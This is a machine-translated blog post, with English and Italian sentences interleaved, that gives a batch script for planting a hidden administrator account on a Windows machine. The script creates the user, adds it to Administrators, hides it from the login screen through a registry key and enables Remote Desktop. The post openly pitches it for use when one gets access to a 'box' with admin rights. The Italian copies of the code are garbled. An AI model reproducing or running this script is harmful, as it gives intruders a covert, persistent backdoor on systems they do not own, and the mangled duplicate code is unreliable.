Your best source of information and news about winvista , secrets and xp on the internet La migliore fonte di informazioni e notizie su winvista, i segreti e XP su Internet

Vista ARTICLES Vista ARTICOLI TOP 50 TOP 50 Spyware Virus Virus Spyware Vista SOFT Vista SOFT Vista HELP Vista AIUTO

How to make a Hidden Admin Account using bat Script ! Come fare un account amministratore Nascosto utilizzando script di pipistrello!


Hey guys i have been playing around with bat scripts and i found this small code that will let you create a admin account and hide it from the super admin. Ehi ragazzi, mi è stato giocare intorno con bat script e ho trovato questo piccolo codice che vi permetterà di creare un account amministratore e nascondere dal super amministratore. so in case you get a chance to access a box with admin status all you have to do is to copy this code to note pad and make the changes and save it as .bat and run it. così nel caso in cui si ottiene la possibilità di accedere a una casella con admin stato tutto ciò che dovete fare è copiare questo codice di Appunti e apportare le modifiche e salvarlo come. bat ed eseguirlo. and then you have your own admin account which is hidden :) {Original Code by Netanelj Credits goes to AgentSmith15 for the Dynamic codes} e poi hai il tuo account amministratore, che è nascosto:) (codice originale da Netanelj Credits va a AgentSmith15 per la dinamica codici)

@Echo Off @ Echo off

SET /P usr=[Enter new username here:] SET / usr P = [Inserire il nuovo nome utente qui:]

SET /P pwd=[Enter new password here:] SET / P = pwd [Invio nuova password qui:]

:: SET /P takes the user input and puts it into the variable. :: SET / P, porta l'utente di input e lo mette in variabile.

echo — Creating New User, “%usr%” with password “%pwd%” – echo - Creazione di un nuovo utente, "% usr%" con password "pwd%%" --

net user “%usr%” “%pwd%” /add net user "% usr%" "% pwd%" / add

echo — Adding User to Group Administrator – echo - Aggiunta di utente ad amministratore del gruppo --

net localgroup Administrators %usr% /add net localgroup amministratori%% usr / aggiungere

echo — User Is Now Administrator — >> echo - user è Adesso amministratore ->>

echo — Hidding User – echo - Hidding Utente --

REG ADD HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v %usr% /t REG_DWORD /d 0 /f REG ADD HKLM \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList / v%% usr / t REG_DWORD / d 0 / f

echo — Activating Terminal Service – echo - Attivare Terminal Service --

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 REG ADD HKLM \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server / v fDenyTSConnections / t REG_DWORD / d 0

echo — Activating Terminal Service Done – echo - Attivare Terminal Service Fatto --

SET /P =Press Enter to continue . SET / P = Premere Invio per continuare. . .

Exit Esci

Copy this to notepad. Copia di questo blocco note. save it as install.bat run it. salvarlo come install.bat eseguirlo.
Enter your desired username & password. Inserisci il tuo nome utente desiderato e la password. done fatto :)

Popularity: 1% Popularity: 1%


Written by magakos. Scritto da magakos. Read more great feeds at is source Per saperne di più grande al feed è fonte WEBSITE SITO WEB
no comments nessun commento . .
Read more articles on Per saperne di più articoli su Scripts Script and e WindowS HackS Windows Hacks and e All Tutto and e otherSoftware otherSoftware . .

Related articles Articoli correlati

No comments Non ci sono commenti

There are still no comments on this article. Non ci sono ancora commenti su questo articolo.

Leave your comment... Lascia un tuo commento ...

If you want to leave your comment on this article, simply fill out the next form: Se si desidera lasciare il tuo commento su questo articolo, è sufficiente compilare il modulo successivo:




You can use these XHTML tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <code> <em> <i> <strike> <strong> . È possibile utilizzare questi tag XHTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <code> <em> <i > <strike> <strong>.